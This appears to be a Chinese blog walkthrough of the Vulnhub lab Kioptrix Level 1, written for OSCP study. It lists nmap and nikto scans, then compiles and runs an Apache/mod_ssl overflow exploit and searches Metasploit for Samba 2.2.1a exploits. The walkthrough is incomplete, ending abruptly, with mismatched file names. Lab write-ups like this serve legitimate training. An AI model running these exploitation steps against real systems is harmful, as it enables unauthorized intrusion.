V2AS问路
Kioptix Level 1
阅读原文时间:2023年07月09日阅读:3

1. 简介

Vulnhub是一个提供各种漏洞环境的靶场平台。

个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。

下载链接

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

相关知识点

*samba 2.2.1a 缓冲区溢出

*samba RCE

*Apache/mod_ssl 缓冲区溢出

1.1信息收集

nmap -sP 192.168.44.0/24

nmap -sV 192.168.44.132

nikto -h 192.168.44.132

https://www.exploit-db.com/search?cve=2002-0082

根据exp提示依次执行

apt-get install libssl-dev

gcc -o 47080 48080.c -lcrypto

gcc -o 47080 48080.c -lcrypto

查询靶机版本为 0x6d - RedHat Linux 7.2 (apache-1.3.24)

./47080 0x6b 192.168.44.132 -c 50

利用metasploit模块 扫描Samba版本

search smb_version

发现samba 版本为2.2.1a

利用searchsploit 搜索关于 samba 2.2.1a 版本漏洞

set palload

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章

Intellij IDEA 插件开发
Android13深入了解 Android 小窗口模式和窗口类型
文心一言(ERNIE Bot)初体验

4

Flutter系列文章-Flutter 插件开发

5

带你读论文丨Fuzzing漏洞挖掘详细总结 GreyOne

6

Android Studio Giraffe安装与gradle配置

7

Android13冻结进程分析:如何提高设备性能和用户体验

8

软件设计 day1

9

[转载]Python 资源大全中文版

10

关于Appium执行用例过程中问题处理办法